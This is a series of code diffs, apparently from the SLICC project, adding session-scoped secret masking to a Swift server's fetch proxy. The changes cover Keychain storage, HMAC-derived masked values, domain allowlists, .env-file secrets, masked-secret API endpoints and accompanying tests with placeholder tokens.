+      key: 'sk-realopenaikey999888777',
+    });
+
+    const scrubbed = manager.scrubResponse(responseBody);
+    expect(scrubbed).not.toContain('ghp_realtoken123456789abcdef');
+    expect(scrubbed).not.toContain('sk-realopenaikey999888777');
+
+    // Should contain masked values instead
+    const gh = manager.getMaskedEntries().find((e) => e.name === 'GITHUB_TOKEN')!;
+    const oai = manager.getMaskedEntries().find((e) => e.name === 'OPENAI_KEY')!;
+    expect(scrubbed).toContain(gh.maskedValue);
+    expect(scrubbed).toContain(oai.maskedValue);
+  });
+
+  it('passes through text unchanged when no secrets match', async () => {
+    await manager.reload();
+    const text = 'Hello world, no secrets here';
+    expect(manager.unmask(text, 'example.com').text).toBe(text);
+    expect(manager.scrubResponse(text)).toBe(text);
+  });
+
+  it('handles empty secret store', async () => {
+    const emptyPath = createTempSecretsFile('');
+    const emptyStore = new EnvSecretStore(emptyPath);
+    const emptyManager = new SecretProxyManager(emptyStore, 'test-session');
+    await emptyManager.reload();
+
+    expect(emptyManager.hasSecrets()).toBe(false);
+    expect(emptyManager.getMaskedEntries()).toHaveLength(0);
+    expect(emptyManager.unmask('text', 'example.com').text).toBe('text');
+    expect(emptyManager.scrubResponse('text')).toBe('text');
+  });
+
+  it('produces deterministic masked values for same session', async () => {
+    await manager.reload();
+    const entries1 = manager.getMaskedEntries();
+
+    // Reload — same session ID should produce same masks
+    await manager.reload();
+    const entries2 = manager.getMaskedEntries();
+
+    for (const e1 of entries1) {
+      const e2 = entries2.find((e) => e.name === e1.name)!;
+      expect(e1.maskedValue).toBe(e2.maskedValue);
+    }
+  });
+});

--- a/packages/swift-server/Sources/CLI/ServerCommand.swift
+++ b/packages/swift-server/Sources/CLI/ServerCommand.swift
@@ -145,7 +145,8 @@ struct ServerCommand: AsyncParsableCommand {
                 logger: Logger(label: "slicc.static-files")
             )
         )
-        registerAPIRoutes(router: router, lickSystem: lickSystem, config: config, httpClient: httpClient)
+        let secretInjector = SecretInjector(sessionId: UUID().uuidString)
+        registerAPIRoutes(router: router, lickSystem: lickSystem, config: config, httpClient: httpClient, secretInjector: secretInjector)
 
         let wsRouter = Router(context: BasicWebSocketRequestContext.self)
         await cdpProxy.install(on: wsRouter, cdpPort: cdpPort)

--- a/packages/swift-server/Sources/CLI/ServerCommand.swift
+++ b/packages/swift-server/Sources/CLI/ServerCommand.swift
@@ -59,6 +59,9 @@ struct ServerCommand: AsyncParsableCommand {
     @Option(name: .long, help: "Path to static UI files (dist/ui)")
     var staticRoot: String?
 
+    @Option(name: .long, help: "Path to secrets .env file")
+    var envFile: String?
+
     mutating func run() async throws {
         let config = ServerConfig.resolve(from: self)
         let logLevel = Self.loggerLevel(from: config.logLevel)
@@ -145,7 +148,8 @@ struct ServerCommand: AsyncParsableCommand {
                 logger: Logger(label: "slicc.static-files")
             )
         )
-        let secretInjector = SecretInjector(sessionId: UUID().uuidString)
+        let envFileSecrets: [Secret] = config.envFileURL.flatMap { Self.parseEnvFileSecrets(at: $0) } ?? []
+        let secretInjector = SecretInjector(sessionId: UUID().uuidString, envFileSecrets: envFileSecrets)
         registerAPIRoutes(router: router, lickSystem: lickSystem, config: config, httpClient: httpClient, secretInjector: secretInjector)
 
         let wsRouter = Router(context: BasicWebSocketRequestContext.self)
@@ -277,6 +281,8 @@ struct ServerConfig: Sendable, Equatable {
     let logDirectoryURL: URL?
     let prompt: String?
     let staticRoot: String?
+    let envFile: String?
+    let envFileURL: URL?
 
     static func resolve(from command: ServerCommand) -> ServerConfig {
         resolve(from: command, arguments: ProcessInfo.processInfo.arguments)
@@ -294,6 +300,7 @@ struct ServerConfig: Sendable, Equatable {
         let normalizedLogDir = normalizedText(command.logDir)
         let normalizedPrompt = normalizedText(command.prompt)
         let normalizedStaticRoot = normalizedText(command.staticRoot)
+        let normalizedEnvFile = normalizedText(command.envFile)
 
         let positiveCdpPort = command.cdpPort > 0 ? command.cdpPort : defaultCliCdpPort
         let resolvedElectron = command.electron || normalizedElectronApp != nil
@@ -323,7 +330,9 @@ struct ServerConfig: Sendable, Equatable {
             logDir: normalizedLogDir,
             logDirectoryURL: resolvedFileURL(from: normalizedLogDir),
             prompt: normalizedPrompt,
-            staticRoot: normalizedStaticRoot
+            staticRoot: normalizedStaticRoot,
+            envFile: normalizedEnvFile,
+            envFileURL: resolvedFileURL(from: normalizedEnvFile)
         )
     }
 
@@ -611,5 +620,56 @@ extension ServerCommand {
 
     struct ParsedTrayJoinURL {
         let joinURL: String
+    }
+
+    /// Parse a .env file into `[Secret]` entries.
+    ///
+    /// Expects KEY=VALUE lines and KEY_DOMAINS=domain1,domain2 lines.
+    /// Keys without a matching _DOMAINS entry are skipped.
+    static func parseEnvFileSecrets(at url: URL) -> [Secret]? {
+        guard let content = try? String(contentsOf: url, encoding: .utf8) else {
+            return nil
+        }
+
+        let domainsSuffix = "_DOMAINS"
+        var entries: [(key: String, value: String)] = []
+
+        for raw in content.components(separatedBy: "\n") {
+            let line = raw.trimmingCharacters(in: .whitespacesAndNewlines)
+            if line.isEmpty || line.hasPrefix("#") { continue }
+
+            guard let eqIndex = line.firstIndex(of: "=") else { continue }
+            let key = line[line.startIndex..<eqIndex].trimmingCharacters(in: .whitespacesAndNewlines)
+            var value = line[line.index(after: eqIndex)...].trimmingCharacters(in: .whitespacesAndNewlines)
+
+            // Strip matching quotes
+            if (value.hasPrefix("\"") && value.hasSuffix("\""))
+                || (value.hasPrefix("'") && value.hasSuffix("'")) {
+                value = String(value.dropFirst().dropLast())
+            }
+
+            if !key.isEmpty {
+                entries.append((key: key, value: value))
+            }
+        }
+
+        var secrets: [Secret] = []
+        for entry in entries {
+            if entry.key.hasSuffix(domainsSuffix) { continue }
+
+            let domainsKey = entry.key + domainsSuffix
+            guard let domainsEntry = entries.first(where: { $0.key == domainsKey }) else { continue }
+
+            let domains = domainsEntry.value
+                .components(separatedBy: ",")
+                .map { $0.trimmingCharacters(in: .whitespacesAndNewlines) }
+                .filter { !$0.isEmpty }
+
+            if !domains.isEmpty {
+                secrets.append(Secret(name: entry.key, value: entry.value, domains: domains))
+            }
+        }
+
+        return secrets
     }
 }

--- a/packages/swift-server/Sources/Keychain/SecretInjector.swift
+++ b/packages/swift-server/Sources/Keychain/SecretInjector.swift
@@ -7,6 +7,9 @@ import Foundation
 /// uses this to:
 /// 1. Replace masked values → real values in outbound requests (with domain checks)
 /// 2. Replace real values → masked values in inbound responses
+///
+/// Call `reload()` after secret mutations (POST/DELETE) to pick up changes
+/// while keeping the same session ID for stable masked values.
 public final class SecretInjector: Sendable {
 
     /// A loaded secret with its masked counterpart.
@@ -25,19 +28,58 @@ public final class SecretInjector: Sendable {
         case domainBlocked(secretName: String, hostname: String)
     }
 
-    private let secrets: [LoadedSecret]
-    private let responseScrubber: @Sendable (String) -> String
+    /// The session ID used for masking. Kept stable across reloads.
+    private let sessionId: String?
+
+    private let lock = NSLock()
+    private nonisolated(unsafe) var _secrets: [LoadedSecret]
+    private nonisolated(unsafe) var _responseScrubber: @Sendable (String) -> String
+
+    private var secrets: [LoadedSecret] {
+        lock.lock()
+        defer { lock.unlock() }
+        return _secrets
+    }
+
+    private var responseScrubber: @Sendable (String) -> String {
+        lock.lock()
+        defer { lock.unlock() }
+        return _responseScrubber
+    }
+
+    private func setSecretsAndScrubber(secrets: [LoadedSecret], scrubber: @Sendable @escaping (String) -> String) {
+        lock.lock()
+        defer { lock.unlock() }
+        _secrets = secrets
+        _responseScrubber = scrubber
+    }
 
     /// Initialize with an explicit list of loaded secrets (for testing).
     init(secrets: [LoadedSecret]) {
-        self.secrets = secrets
+        self.sessionId = nil
+        self._secrets = secrets
         let pairs = secrets.map { SecretPair(realValue: $0.realValue, maskedValue: $0.maskedValue) }
-        self.responseScrubber = buildScrubber(secrets: pairs)
+        self._responseScrubber = buildScrubber(secrets: pairs)
     }
 
     /// Initialize by loading all secrets from the Keychain and masking them
     /// with the given session ID.
-    convenience init(sessionId: String) {
+    init(sessionId: String) {
+        self.sessionId = sessionId
+        self._secrets = []
+        self._responseScrubber = { $0 }
+        loadFromKeychain()
+    }
+
+    /// Reload secrets from the Keychain, keeping the same session ID.
+    /// Call this after secret mutations (POST/DELETE) so the injector
+    /// picks up added/removed secrets.
+    func reload() {
+        loadFromKeychain()
+    }
+
+    private func loadFromKeychain() {
+        guard let sessionId else { return }
         let entries = SecretStore.list()
         var loaded: [LoadedSecret] = []
         for entry in entries {
@@ -50,7 +92,8 @@ public final class SecretInjector: Sendable {
                 domains: secret.domains
             ))
         }
-        self.init(secrets: loaded)
+        let pairs = loaded.map { SecretPair(realValue: $0.realValue, maskedValue: $0.maskedValue) }
+        setSecretsAndScrubber(secrets: loaded, scrubber: buildScrubber(secrets: pairs))
     }
 
     /// Returns true if there are no secrets loaded.

--- a/packages/swift-server/Sources/Keychain/SecretInjector.swift
+++ b/packages/swift-server/Sources/Keychain/SecretInjector.swift
@@ -66,6 +66,11 @@ public final class SecretInjector: Sendable {
         return env
     }
 
+    /// Returns masked entries with name, maskedValue, and domains for the /api/secrets/masked endpoint.
+    var maskedEntries: [(name: String, maskedValue: String, domains: [String])] {
+        secrets.map { (name: $0.name, maskedValue: $0.maskedValue, domains: $0.domains) }
+    }
+
     /// Inject real values into text destined for an upstream request.
     ///
     /// Scans `text` for any known masked values. For each match:

--- a/packages/swift-server/Sources/Keychain/SecretInjector.swift
+++ b/packages/swift-server/Sources/Keychain/SecretInjector.swift
@@ -114,7 +114,7 @@ public final class SecretInjector: Sendable {
         secrets.map { (name: $0.name, maskedValue: $0.maskedValue, domains: $0.domains) }
     }
 
-    /// Inject real values into text destined for an upstream request.
+    /// Inject real values into text destined for an upstream request (headers).
     ///
     /// Scans `text` for any known masked values. For each match:
     /// - Validates the target `hostname` against the secret's domain allowlist.
@@ -130,6 +130,25 @@ public final class SecretInjector: Sendable {
             result = result.replacingOccurrences(of: secret.maskedValue, with: secret.realValue)
         }
         return .success(text: result)
+    }
+
+    /// Inject real values into request body text.
+    ///
+    /// Unlike `inject(text:hostname:)`, when the domain does NOT match,
+    /// the masked value is left as-is (not rejected). This is safe because
+    /// the masked value is meaningless — it's typically conversation context
+    /// sent to an LLM API like Bedrock.
+    func injectBody(text: String, hostname: String) -> String {
+        var result = text
+        for secret in secrets {
+            guard result.contains(secret.maskedValue) else { continue }
+            guard isAllowedDomain(patterns: secret.domains, hostname: hostname) else {
+                // Leave the masked value as-is — do not reject, do not unmask
+                continue
+            }
+            result = result.replacingOccurrences(of: secret.maskedValue, with: secret.realValue)
+        }
+        return result
     }
 
     /// Scrub real secret values from response text, replacing with masked equivalents.

--- a/packages/swift-server/Sources/Keychain/SecretInjector.swift
+++ b/packages/swift-server/Sources/Keychain/SecretInjector.swift
@@ -1,0 +1,92 @@
+import Foundation
+
+/// Manages session-scoped secret masking and injection for the fetch proxy.
+///
+/// On initialization, loads all secrets from the Keychain and generates
+/// deterministic masked values for the current session. The fetch proxy
+/// uses this to:
+/// 1. Replace masked values → real values in outbound requests (with domain checks)
+/// 2. Replace real values → masked values in inbound responses
+public final class SecretInjector: Sendable {
+
+    /// A loaded secret with its masked counterpart.
+    struct LoadedSecret: Sendable {
+        let name: String
+        let realValue: String
+        let maskedValue: String
+        let domains: [String]
+    }
+
+    /// Result of attempting to inject secrets into a request.
+    enum InjectionResult: Sendable {
+        /// All masked values were successfully replaced with real values.
+        case success(text: String)
+        /// A masked value was found but the target domain is not allowed.
+        case domainBlocked(secretName: String, hostname: String)
+    }
+
+    private let secrets: [LoadedSecret]
+    private let responseScrubber: @Sendable (String) -> String
+
+    /// Initialize with an explicit list of loaded secrets (for testing).
+    init(secrets: [LoadedSecret]) {
+        self.secrets = secrets
+        let pairs = secrets.map { SecretPair(realValue: $0.realValue, maskedValue: $0.maskedValue) }
+        self.responseScrubber = buildScrubber(secrets: pairs)
+    }
+
+    /// Initialize by loading all secrets from the Keychain and masking them
+    /// with the given session ID.
+    convenience init(sessionId: String) {
+        let entries = SecretStore.list()
+        var loaded: [LoadedSecret] = []
+        for entry in entries {
+            guard let secret = SecretStore.get(name: entry.name) else { continue }
+            let masked = mask(sessionId: sessionId, secretName: secret.name, realValue: secret.value)
+            loaded.append(LoadedSecret(
+                name: secret.name,
+                realValue: secret.value,
+                maskedValue: masked,
+                domains: secret.domains
+            ))
+        }
+        self.init(secrets: loaded)
+    }
+
+    /// Returns true if there are no secrets loaded.
+    var isEmpty: Bool { secrets.isEmpty }
+
+    /// Returns masked environment variables for the agent's shell.
+    /// Each secret becomes `name → maskedValue`.
+    var maskedEnvironment: [String: String] {
+        var env: [String: String] = [:]
+        for s in secrets {
+            env[s.name] = s.maskedValue
+        }
+        return env
+    }
+
+    /// Inject real values into text destined for an upstream request.
+    ///
+    /// Scans `text` for any known masked values. For each match:
+    /// - Validates the target `hostname` against the secret's domain allowlist.
+    /// - If allowed, replaces masked → real.
+    /// - If not allowed, returns `.domainBlocked` immediately.
+    func inject(text: String, hostname: String) -> InjectionResult {
+        var result = text
+        for secret in secrets {
+            guard result.contains(secret.maskedValue) else { continue }
+            guard isAllowedDomain(patterns: secret.domains, hostname: hostname) else {
+                return .domainBlocked(secretName: secret.name, hostname: hostname)
+            }
+            result = result.replacingOccurrences(of: secret.maskedValue, with: secret.realValue)
+        }
+        return .success(text: result)
+    }
+
+    /// Scrub real secret values from response text, replacing with masked equivalents.
+    func scrub(text: String) -> String {
+        responseScrubber(text)
+    }
+}
+

--- a/packages/swift-server/Sources/Keychain/SecretInjector.swift
+++ b/packages/swift-server/Sources/Keychain/SecretInjector.swift
@@ -31,6 +31,9 @@ public final class SecretInjector: Sendable {
     /// The session ID used for masking. Kept stable across reloads.
     private let sessionId: String?
 
+    /// Secrets loaded from an env file that override/supplement Keychain secrets.
+    private let _envFileSecrets: [Secret]
+
     private let lock = NSLock()
     private nonisolated(unsafe) var _secrets: [LoadedSecret]
     private nonisolated(unsafe) var _responseScrubber: @Sendable (String) -> String
@@ -57,31 +60,35 @@ public final class SecretInjector: Sendable {
     /// Initialize with an explicit list of loaded secrets (for testing).
     init(secrets: [LoadedSecret]) {
         self.sessionId = nil
+        self._envFileSecrets = []
         self._secrets = secrets
         let pairs = secrets.map { SecretPair(realValue: $0.realValue, maskedValue: $0.maskedValue) }
         self._responseScrubber = buildScrubber(secrets: pairs)
     }
 
     /// Initialize by loading all secrets from the Keychain and masking them
-    /// with the given session ID.
-    init(sessionId: String) {
+    /// with the given session ID. Optional `envFileSecrets` are merged in
+    /// and override Keychain entries with the same name.
+    init(sessionId: String, envFileSecrets: [Secret] = []) {
         self.sessionId = sessionId
+        self._envFileSecrets = envFileSecrets
         self._secrets = []
         self._responseScrubber = { $0 }
-        loadFromKeychain()
+        loadSecrets()
     }
 
-    /// Reload secrets from the Keychain, keeping the same session ID.
-    /// Call this after secret mutations (POST/DELETE) so the injector
-    /// picks up added/removed secrets.
+    /// Reload secrets from the Keychain (and env file overrides), keeping
+    /// the same session ID. Call this after secret mutations (POST/DELETE)
+    /// so the injector picks up added/removed secrets.
     func reload() {
-        loadFromKeychain()
+        loadSecrets()
     }
 
-    private func loadFromKeychain() {
+    private func loadSecrets() {
         guard let sessionId else { return }
         let entries = SecretStore.list()
         var loaded: [LoadedSecret] = []
+        var loadedNames: Set<String> = []
         for entry in entries {
             guard let secret = SecretStore.get(name: entry.name) else { continue }
             let masked = mask(sessionId: sessionId, secretName: secret.name, realValue: secret.value)
@@ -91,7 +98,25 @@ public final class SecretInjector: Sendable {
                 maskedValue: masked,
                 domains: secret.domains
             ))
+            loadedNames.insert(secret.name)
         }
+
+        // Merge env-file secrets: override existing by name, append new ones
+        for secret in _envFileSecrets {
+            let masked = mask(sessionId: sessionId, secretName: secret.name, realValue: secret.value)
+            let entry = LoadedSecret(
+                name: secret.name,
+                realValue: secret.value,
+                maskedValue: masked,
+                domains: secret.domains
+            )
+            if let idx = loaded.firstIndex(where: { $0.name == secret.name }) {
+                loaded[idx] = entry
+            } else {
+                loaded.append(entry)
+            }
+        }
+
         let pairs = loaded.map { SecretPair(realValue: $0.realValue, maskedValue: $0.maskedValue) }
         setSecretsAndScrubber(secrets: loaded, scrubber: buildScrubber(secrets: pairs))
     }

--- a/packages/swift-server/Sources/Keychain/SecretMasking.swift
+++ b/packages/swift-server/Sources/Keychain/SecretMasking.swift
@@ -88,7 +88,7 @@ public struct SecretPair {
 /// `realValue` with its `maskedValue`.
 ///
 /// Secrets are sorted longest-first to avoid partial-match clobbering.
-public func buildScrubber(secrets: [SecretPair]) -> (String) -> String {
+public func buildScrubber(secrets: [SecretPair]) -> @Sendable (String) -> String {
     guard !secrets.isEmpty else { return { $0 } }
 
     let sorted = secrets.sorted { $0.realValue.count > $1.realValue.count }

--- a/packages/swift-server/Sources/Keychain/SecretMasking.swift
+++ b/packages/swift-server/Sources/Keychain/SecretMasking.swift
@@ -104,12 +104,16 @@ public func buildScrubber(secrets: [SecretPair]) -> @Sendable (String) -> String
 
 /// Domain glob matching.
 ///
+/// - `*` matches any domain
 /// - `api.github.com` matches exactly
 /// - `*.github.com` matches `api.github.com`, `uploads.github.com`,
 ///   but NOT `github.com` itself
 public func domainMatches(pattern: String, hostname: String) -> Bool {
     let p = pattern.lowercased()
     let h = hostname.lowercased()
+
+    // Bare wildcard: allow any domain
+    if p == "*" { return true }
 
     guard p.hasPrefix("*.") else {
         return p == h

--- a/packages/swift-server/Sources/Keychain/SecretMasking.swift
+++ b/packages/swift-server/Sources/Keychain/SecretMasking.swift
@@ -1,0 +1,127 @@
+import CommonCrypto
+import Foundation
+
+// MARK: - Known Token Prefixes
+
+private let knownPrefixes: [String] = [
+    "github_pat_",
+    "sk-ant-",
+    "Bearer ",
+    "ghp_",
+    "gho_",
+    "ghu_",
+    "ghs_",
+    "ghr_",
+    "xoxb-",
+    "xoxp-",
+    "xoxa-",
+    "xoxs-",
+    "sk-",
+    "pk-",
+    "AKIA",
+    "ABIA",
+    "ACCA",
+    "ASIA",
+]
+
+// Sorted longest-first for most-specific matching
+private let sortedPrefixes = knownPrefixes.sorted { $0.count > $1.count }
+
+private func detectPrefix(_ value: String) -> String {
+    for p in sortedPrefixes {
+        if value.hasPrefix(p) { return p }
+    }
+    return ""
+}
+
+// MARK: - HMAC-SHA256
+
+private func hmacSHA256(key: String, message: String) -> [UInt8] {
+    let keyData = Array(key.utf8)
+    let messageData = Array(message.utf8)
+    var result = [UInt8](repeating: 0, count: Int(CC_SHA256_DIGEST_LENGTH))
+    CCHmac(
+        CCHmacAlgorithm(kCCHmacAlgSHA256),
+        keyData, keyData.count,
+        messageData, messageData.count,
+        &result
+    )
+    return result
+}
+
+private func toHex(_ bytes: [UInt8]) -> String {
+    bytes.map { String(format: "%02x", $0) }.joined()
+}
+
+// MARK: - Public API
+
+/// Produce a deterministic, format-preserving masked value.
+///
+/// `masked = prefix + hex(HMAC-SHA256(sessionId+secretName, realValue))`
+/// truncated or repeated to match the original value length.
+public func mask(sessionId: String, secretName: String, realValue: String) -> String {
+    let prefix = detectPrefix(realValue)
+    let remainder = String(realValue.dropFirst(prefix.count))
+
+    let hmac = hmacSHA256(key: sessionId + secretName, message: realValue)
+    var hex = toHex(hmac)
+
+    // Repeat hex if remainder is longer than 64 hex chars
+    while hex.count < remainder.count { hex += hex }
+    let maskedRemainder = String(hex.prefix(remainder.count))
+
+    return prefix + maskedRemainder
+}
+
+/// A pair of real ↔ masked secret values for scrubbing.
+public struct SecretPair {
+    public let realValue: String
+    public let maskedValue: String
+
+    public init(realValue: String, maskedValue: String) {
+        self.realValue = realValue
+        self.maskedValue = maskedValue
+    }
+}
+
+/// Build a reusable scrubber that replaces every occurrence of any
+/// `realValue` with its `maskedValue`.
+///
+/// Secrets are sorted longest-first to avoid partial-match clobbering.
+public func buildScrubber(secrets: [SecretPair]) -> (String) -> String {
+    guard !secrets.isEmpty else { return { $0 } }
+
+    let sorted = secrets.sorted { $0.realValue.count > $1.realValue.count }
+
+    return { text in
+        var result = text
+        for pair in sorted {
+            result = result.replacingOccurrences(of: pair.realValue, with: pair.maskedValue)
+        }
+        return result
+    }
+}
+
+/// Domain glob matching.
+///
+/// - `api.github.com` matches exactly
+/// - `*.github.com` matches `api.github.com`, `uploads.github.com`,
+///   but NOT `github.com` itself
+public func domainMatches(pattern: String, hostname: String) -> Bool {
+    let p = pattern.lowercased()
+    let h = hostname.lowercased()
+
+    guard p.hasPrefix("*.") else {
+        return p == h
+    }
+
+    // Wildcard: `*.example.com`
+    let suffix = String(p.dropFirst(1)) // `.example.com`
+    return h.count > suffix.count && h.hasSuffix(suffix)
+}
+
+/// Check if hostname is allowed by any of the domain patterns.
+public func isAllowedDomain(patterns: [String], hostname: String) -> Bool {
+    patterns.contains { domainMatches(pattern: $0, hostname: hostname) }
+}
+

--- a/packages/swift-server/Sources/Keychain/SecretStore.swift
+++ b/packages/swift-server/Sources/Keychain/SecretStore.swift
@@ -1,0 +1,152 @@
+import Foundation
+import Security
+
+/// A secret entry returned by `list()` — name + domains, never the value.
+struct SecretEntry: Sendable, Equatable {
+    let name: String
+    let domains: [String]
+}
+
+/// A retrieved secret with its value and domain allowlist.
+struct Secret: Sendable, Equatable {
+    let name: String
+    let value: String
+    let domains: [String]
+}
+
+enum SecretStoreError: Error, Sendable, Equatable {
+    case emptyDomains
+    case keychainError(status: Int32)
+}
+
+/// Keychain service identifier used for all SLICC secrets.
+private let keychainService = "ai.sliccy.slicc"
+
+/// CRUD operations for secrets stored in the macOS Keychain.
+///
+/// - Service: `ai.sliccy.slicc`
+/// - Account: secret name (e.g. `GITHUB_TOKEN`)
+/// - Value: secret value in `kSecValueData`
+/// - Domains: comma-separated in `kSecAttrComment`
+enum SecretStore {
+
+    /// Retrieve a secret and its domains from the Keychain.
+    static func get(name: String) -> Secret? {
+        let query: [String: Any] = [
+            kSecClass as String: kSecClassGenericPassword,
+            kSecAttrService as String: keychainService,
+            kSecAttrAccount as String: name,
+            kSecReturnData as String: true,
+            kSecReturnAttributes as String: true,
+            kSecMatchLimit as String: kSecMatchLimitOne,
+        ]
+
+        var result: AnyObject?
+        let status = SecItemCopyMatching(query as CFDictionary, &result)
+
+        guard status == errSecSuccess,
+            let attrs = result as? [String: Any],
+            let data = attrs[kSecValueData as String] as? Data,
+            let value = String(data: data, encoding: .utf8)
+        else {
+            return nil
+        }
+
+        let comment = attrs[kSecAttrComment as String] as? String ?? ""
+        let domains = parseDomains(comment)
+        return Secret(name: name, value: value, domains: domains)
+    }
+
+    /// Store or update a secret in the Keychain.
+    /// - Throws: `SecretStoreError.emptyDomains` if `domains` is empty.
+    static func set(name: String, value: String, domains: [String]) throws {
+        guard !domains.isEmpty else {
+            throw SecretStoreError.emptyDomains
+        }
+
+        let comment = domains.joined(separator: ",")
+        let valueData = Data(value.utf8)
+
+        // Try to update first.
+        let searchQuery: [String: Any] = [
+            kSecClass as String: kSecClassGenericPassword,
+            kSecAttrService as String: keychainService,
+            kSecAttrAccount as String: name,
+        ]
+        let updateAttrs: [String: Any] = [
+            kSecValueData as String: valueData,
+            kSecAttrComment as String: comment,
+        ]
+
+        let updateStatus = SecItemUpdate(searchQuery as CFDictionary, updateAttrs as CFDictionary)
+
+        if updateStatus == errSecSuccess {
+            return
+        }
+
+        if updateStatus == errSecItemNotFound {
+            // Add new item.
+            var addQuery = searchQuery
+            addQuery[kSecValueData as String] = valueData
+            addQuery[kSecAttrComment as String] = comment
+
+            let addStatus = SecItemAdd(addQuery as CFDictionary, nil)
+            guard addStatus == errSecSuccess else {
+                throw SecretStoreError.keychainError(status: addStatus)
+            }
+            return
+        }
+
+        throw SecretStoreError.keychainError(status: updateStatus)
+    }
+
+    /// Remove a secret from the Keychain.
+    static func delete(name: String) throws {
+        let query: [String: Any] = [
+            kSecClass as String: kSecClassGenericPassword,
+            kSecAttrService as String: keychainService,
+            kSecAttrAccount as String: name,
+        ]
+
+        let status = SecItemDelete(query as CFDictionary)
+        guard status == errSecSuccess || status == errSecItemNotFound else {
+            throw SecretStoreError.keychainError(status: status)
+        }
+    }
+
+    /// List all secret names and domains (never values).
+    static func list() -> [SecretEntry] {
+        let query: [String: Any] = [
+            kSecClass as String: kSecClassGenericPassword,
+            kSecAttrService as String: keychainService,
+            kSecReturnAttributes as String: true,
+            kSecMatchLimit as String: kSecMatchLimitAll,
+        ]
+
+        var result: AnyObject?
+        let status = SecItemCopyMatching(query as CFDictionary, &result)
+
+        guard status == errSecSuccess,
+            let items = result as? [[String: Any]]
+        else {
+            return []
+        }
+
+        return items.compactMap { attrs in
+            guard let account = attrs[kSecAttrAccount as String] as? String else {
+                return nil
+            }
+            let comment = attrs[kSecAttrComment as String] as? String ?? ""
+            return SecretEntry(name: account, domains: parseDomains(comment))
+        }
+    }
+
+    /// Parse a comma-separated domain string, trimming whitespace and
+    /// dropping empty entries.
+    private static func parseDomains(_ raw: String) -> [String] {
+        raw.split(separator: ",")
+            .map { $0.trimmingCharacters(in: .whitespaces) }
+            .filter { !$0.isEmpty }
+    }
+}
+

--- a/packages/swift-server/Sources/Server/APIRoutes.swift
+++ b/packages/swift-server/Sources/Server/APIRoutes.swift
@@ -284,19 +284,14 @@ func registerAPIRoutes(
                     }
                 }
 
-                // Inject secrets into request body
+                // Inject secrets into request body — uses injectBody which leaves
+                // masked values as-is on domain mismatch (safe/meaningless) rather
+                // than rejecting. Avoids false 403s from LLM conversation context.
                 if rawBody.readableBytes > 0,
                    let bodyString = rawBody.getString(at: rawBody.readerIndex, length: rawBody.readableBytes) {
-                    switch secretInjector.inject(text: bodyString, hostname: targetHostname) {
-                    case .success(let replaced):
-                        if replaced != bodyString {
-                            rawBody = ByteBuffer(string: replaced)
-                        }
-                    case .domainBlocked(let secretName, let hostname):
-                        return try jsonErrorResponse(
-                            status: .forbidden,
-                            message: "Secret \(secretName) is not allowed for domain \(hostname)"
-                        )
+                    let replaced = secretInjector.injectBody(text: bodyString, hostname: targetHostname)
+                    if replaced != bodyString {
+                        rawBody = ByteBuffer(string: replaced)
                     }
                 }
 

--- a/packages/swift-server/Sources/Server/APIRoutes.swift
+++ b/packages/swift-server/Sources/Server/APIRoutes.swift
@@ -210,7 +210,7 @@ func registerAPIRoutes(
         guard let name = payload["name"]?.stringValue, !name.isEmpty else {
             return try jsonErrorResponse(status: .badRequest, message: "Missing required field: name")
         }
-        guard let value = payload["value"]?.stringValue else {
+        guard let value = payload["value"]?.stringValue, !value.isEmpty else {
             return try jsonErrorResponse(status: .badRequest, message: "Missing required field: value")
         }
         let domains: [String]
@@ -221,6 +221,7 @@ func registerAPIRoutes(
         }
         do {
             try SecretStore.set(name: name, value: value, domains: domains)
+            secretInjector.reload()
             return try jsonResponse(.object(["ok": .bool(true), "name": .string(name)]))
         } catch SecretStoreError.emptyDomains {
             return try jsonErrorResponse(status: .badRequest, message: "Secret must have at least one authorized domain")
@@ -233,6 +234,7 @@ func registerAPIRoutes(
         let name = context.parameters.get("name") ?? ""
         do {
             try SecretStore.delete(name: name)
+            secretInjector.reload()
             return try jsonResponse(.object(["ok": .bool(true), "name": .string(name)]))
         } catch {
             return try jsonErrorResponse(status: .internalServerError, message: errorMessage(error))
@@ -298,7 +300,6 @@ func registerAPIRoutes(
                     }
                 }
 
-                // Also inject into the target URL header value for the upstream request
                 let injectedRequest = Request(
                     head: .init(
                         method: request.method,

--- a/packages/swift-server/Sources/Server/APIRoutes.swift
+++ b/packages/swift-server/Sources/Server/APIRoutes.swift
@@ -239,6 +239,21 @@ func registerAPIRoutes(
         }
     }
 
+    // Masked secrets endpoint — returns name + maskedValue + domains for shell env population.
+    // The browser fetches this at shell init to populate env vars with masked values.
+    // Real values are never exposed; only deterministic session-scoped masks.
+    router.get("/api/secrets/masked") { _, _ in
+        let entries = secretInjector.maskedEntries
+        let items: [LickSystem.JSONValue] = entries.map { entry in
+            .object([
+                "name": .string(entry.name),
+                "maskedValue": .string(entry.maskedValue),
+                "domains": .array(entry.domains.map { .string($0) }),
+            ])
+        }
+        return try jsonResponse(.array(items))
+    }
+
     for method in fetchProxyMethods {
         router.on("/api/fetch-proxy", method: method) { request, _ in
             guard let targetURLValue = request.headers[targetURLHeader],

--- a/packages/swift-server/Sources/Server/APIRoutes.swift
+++ b/packages/swift-server/Sources/Server/APIRoutes.swift
@@ -45,7 +45,8 @@ func registerAPIRoutes(
     router: Router<some RequestContext>,
     lickSystem: LickSystem,
     config: ServerConfig,
-    httpClient: HTTPClient
+    httpClient: HTTPClient,
+    secretInjector: SecretInjector = SecretInjector(secrets: [])
 ) {
     router.get("/api/runtime-config") { _, _ in
         let envWorkerBaseUrl: String? = {
@@ -192,6 +193,52 @@ func registerAPIRoutes(
         )
     }
 
+    // Secret management API — direct Keychain access (no browser needed)
+    router.get("/api/secrets") { _, _ in
+        let entries = SecretStore.list()
+        let items: [LickSystem.JSONValue] = entries.map { entry in
+            .object([
+                "name": .string(entry.name),
+                "domains": .array(entry.domains.map { .string($0) }),
+            ])
+        }
+        return try jsonResponse(.array(items))
+    }
+
+    router.post("/api/secrets") { request, context in
+        let payload = try await decodeJSONObjectBody(from: request, context: context)
+        guard let name = payload["name"]?.stringValue, !name.isEmpty else {
+            return try jsonErrorResponse(status: .badRequest, message: "Missing required field: name")
+        }
+        guard let value = payload["value"]?.stringValue else {
+            return try jsonErrorResponse(status: .badRequest, message: "Missing required field: value")
+        }
+        let domains: [String]
+        if case .array(let arr) = payload["domains"] {
+            domains = arr.compactMap(\.stringValue)
+        } else {
+            domains = []
+        }
+        do {
+            try SecretStore.set(name: name, value: value, domains: domains)
+            return try jsonResponse(.object(["ok": .bool(true), "name": .string(name)]))
+        } catch SecretStoreError.emptyDomains {
